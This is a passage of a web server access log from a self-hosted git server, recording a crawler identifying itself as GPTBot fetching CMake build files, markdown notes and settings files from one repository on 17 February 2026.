+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12893] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12892] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12893] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" -[17/Feb/2026:15:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" -[17/Feb/2026:15:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20373] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20376] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43162] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43160] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14641] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20386] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11100] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20385] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20382] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:42 +0000] 